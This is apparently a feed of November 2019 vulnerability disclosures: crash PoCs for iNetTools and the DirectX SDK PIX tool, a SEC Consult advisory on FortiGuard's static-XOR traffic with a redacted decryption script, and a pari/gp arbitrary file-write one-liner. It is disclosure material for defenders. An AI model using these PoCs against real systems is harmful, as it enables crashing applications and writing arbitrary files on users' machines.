MD5 | 9bcf97c9fe40f66344be31ec0110c02f# Exploit Title: iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2019-11-25
# Vendor Homepage: https://apps.apple.com/mx/app/inettools-ping-dns-port-scan/id561659975
# Software Link: App Store for iOS devices
# Tested Version: 8.20
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s iOS 13.2
# Summary: iNetTools is a suite of network diagnose tools on iPhone and iPad. It provides essential tools such as
# Ping, DNS Lookup, Trace Route, Port Scan, Whois, Server Monitor, and Lan Scan.
# Steps to Produce the Crash:
# 1.- Run python code: iNetTools.py
# 2.- Copy content to clipboard
# 3.- Open "iNetTools for iOS"
# 4.- Go to "Whois"
# 5.- Paste ClipBoard on "Domain Name"
# 6.- Start
# 7.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 98
print (buffer)
↧
↧
November 26, 2019, 9:42 am
Fortinet products, including FortiGate and Forticlient, regularly send information to Fortinet servers using XOR "encryption" with a static key. Versions affected include FortiOS versions 6.0.6 and below, FortiClientWindows versions 6.0.6 and below, and FortiClientMac versions 6.2.1 and below.
MD5 | 9d942ec809afdd8e4584b2dfc2667c2fSEC Consult Vulnerability Lab Security Advisory < 20191125-0 >
=======================================================================
title: FortiGuard XOR Encryption
product: Multiple Fortinet Products (see Vulnerable / tested versions)
vulnerable version: Multiple (see Vulnerable / tested versions)
fixed version: Multiple (see Solution)
CVE number: CVE-2018-9195
impact: High
homepage: https://www.fortinet.com
found: 2018-05-16
by: Stefan Viehböck (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"From the start, the Fortinet vision has been to deliver broad, truly
integrated, high-performance security across the IT infrastructure.
We provide top-rated network and content security, as well as secure access
products that share intelligence and work together to form a cooperative
fabric. Our unique security fabric combines Security Processors, an intuitive
operating system, and applied threat intelligence to give you proven security,
exceptional performance, and better visibility and control--while providing
easier administration."
Source: https://www.fortinet.com/corporate/about-us/about-us.html
Business recommendation:
------------------------
The vendor provides a patch and users of affected products are urged to
immediately upgrade to the latest version available.
Vulnerability overview/description:
-----------------------------------
Fortinet products, including FortiGate and Forticlient regularly send
information to Fortinet servers (DNS: guard.fortinet.com) on
- UDP ports 53, 8888 and
- TCP port 80 (HTTP POST /fgdsvc)
This cloud communication is used for the FortiGuard Web Filter feature (https://fortiguard.com/webfilter),
FortiGuard AntiSpam feature (https://fortiguard.com/updates/antispam)
and FortiGuard AntiVirus feature (https://fortiguard.com/updates/antivirus).
The messages are encrypted using XOR "encryption" with a static key.
The protocol messages contain the following types of information:
**Serial number of the Fortinet product installation** (product type + unique ID).
This information allows an attacker who can **passively monitor** internet traffic to:
- learn which Fortinet products and product types an organization uses
(this is valuable for information gathering, see EquationGroup Fortigate exploits)
- learn which FortiClient installations are part of an organization
- use the FortiClient serial number as a unique identifier to track an individual as
he/she travels the world
**Full HTTP URLs of users web surfing activity** (Web Filter feature).
This information allows an attacker who can **passively monitor** internet traffic
to spy on users' web surfing activity. In cases where SSL inspection is enabled,
even the URLs of HTTPS-encrypted communication are sent via this protocol,
effectively breaking the confidentiality of SSL/TLS.
**Unspecified email data** (AntiSpam feature).
We do not have any further information on what kind of information is sent by the
AntiSpam feature.
**Unspecified AntiVirus data** (AntiVirus feature).
We do not have any further information on what kind of information is sent by the
AntiVirus feature.
By **intercepting and manipulating** internet traffic an attacker can:
Manipulate the responses for FortiGuard Web Filter, AntiSpam and AntiVirus features.
Proof of concept:
-----------------
The following Python 3 script decrypts a FortiGuard message (the static XOR key
has been removed from this advisory).
```python
from itertools import cycle
def forti_xor(s1):
xor_key = **removed**
message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key)))
return message
r1=bytes.fromhex('6968766f606e776c2d2d21262138475c5b5a475b545e475c6b6a776b646e776c6b6a772b646e776c6b6a776b646e776c6b6a776bbadf04036b6a776c616a846f')
print(repr(forti_xor(r1)))
```
In this case the encrypted message contents are:
'\x02\x02\x01\x04\x04\x00\x00\x00FGVMEV0000000000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00...'
Another example:
'\x02\x01\x02\x04úI\x03\x00FG100D3G00000000\x00\x00\...x00\x00+https://v10.vortex-win.data.microsoft.com/\x00'
Vulnerable / tested versions:
-----------------------------
The following FortiOS versions are affected according to the vendor:
* FortiOS 6.0.6 and below
* FortiClientWindows 6.0.6 and below
* FortiClientMac 6.2.1 and below
The security advisory of the vendor can be found at:
https://fortiguard.com/psirt/FG-IR-18-100
Vendor contact timeline:
------------------------
2018-05-17: Contacting vendor through psirt@fortinet.com, sending advisory with
public PGP key
2018-05-17: Auto-Response: "Thank you for contacting us regarding your
inquiry. We have created a PSIRT ticket for this inquiry"
2018-05-17: Response: "Thank you to report us this vulnerability. I created
an internal incident and I will communicate further with you while
I'm investigating the impact of this."
2018-05-28: Requesting update, "If we don't get an appropriate response (see my
initial email) by the end of next week, we will consider disclosing
the vulnerability without further coordination."
2018-05-28: Auto-Response: "Thank you for contacting us regarding your inquiry.
We have created a PSIRT ticket for this inquiry"
2018-06-05: Requesting update again, "This is the final attempt to contact you",
plus reaching out to Fortinet via Twitter, LinkedIn.
2018-06-05: First response after 3 weeks, developers are working on a fix,
"Please therefore kindly wait for further updates, while we are
coordinating various stakeholders (including FortiGuard servers
maintainers) for a fix."
2018-06-06: Requesting conference call.
2018-06 - 2019-11: Multiple conference calls, discussing technical details, agreeing
on disclosure time
2019-03-28: Fix released in FortiOS 6.2.0
2019-04-01: Fix issued on FortiGuard server side
2019-11-13: Fix released for FortiOS branch 6.0, version 6.0.7
2019-11-25: Public release of security advisory
Solution:
---------
The vendor provides updated versions for the affected products:
* FortiOS 6.0.7 or 6.2.0
* FortiClientWindows 6.2.0
* FortiClientMac 6.2.2
The security advisory of the vendor can be found at: https://fortiguard.com/psirt/FG-IR-18-100
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Stefan Viehböck / @2019
↧
November 26, 2019, 9:44 am
pari/gp versions 2.9.1 on Debian Stretch and 2.11 on Debian Buster allow arbitrary file write and hence arbitrary code execution.
MD5 | 0ecadd450355ff88db28e7b58b63b32apari/gp on debian stable allow arbitrary file write
pari/gp is CAS (computer algebra system).
pari/gp version 2.9.1 on debian stretch and 2.11 on debian buster
allow arbitrary file write and hence arbitrary code execution.
poc:
========
\\ a.gp
\\ to run: \r a.gp
default("logfile","/tmp/a.txt");default("log",1);print("log(1)");
========
Of mathematical interest is pari was missing solutions
to Thue equations when assuming GRH (the fix changed polynomial
bound to exponential bound):
http://pari.math.u-bordeaux.fr/archives/pari-dev-1207/msg00000.html
t=thue(thueinit(x^3+92*x+1,0),3^3);t
--
CV: https://j.ludost.net/resumegg.pdf
site: http://www.guninski.com
blog: https://j.ludost.net/blog
↧
November 27, 2019, 7:59 am
Microsoft DirectX SDK 2010 suffers from a denial of service vulnerability.
MD5 | 3892d191883979a31381aa6e48af01ca#Exploit Title: Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)
#Exploit Author : ZwX
#Exploit Date: 2019-11-26
#Vendor Homepage : https://www.microsoft.com/
#Link Software : https://www.microsoft.com/en-us/download/details.aspx?id=681
#Tested on OS: Windows 7
Proof of Concept (PoC):
=======================
1.Download and install Microsoft DirectX SDK
2.Open the PIX for Windows tools
2.Run the python operating script that will create a file (poc.PIXrun)
3.Run the software "File -> Open File -> Add the file (.PIXrun) "
4.PIX for Windows Crashed
#!/usr/bin/python
DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
poc = DoS
file = open("poc.PIXrun,"w")
file.write(poc)
file.close()
print "POC Created by ZwX"
↧
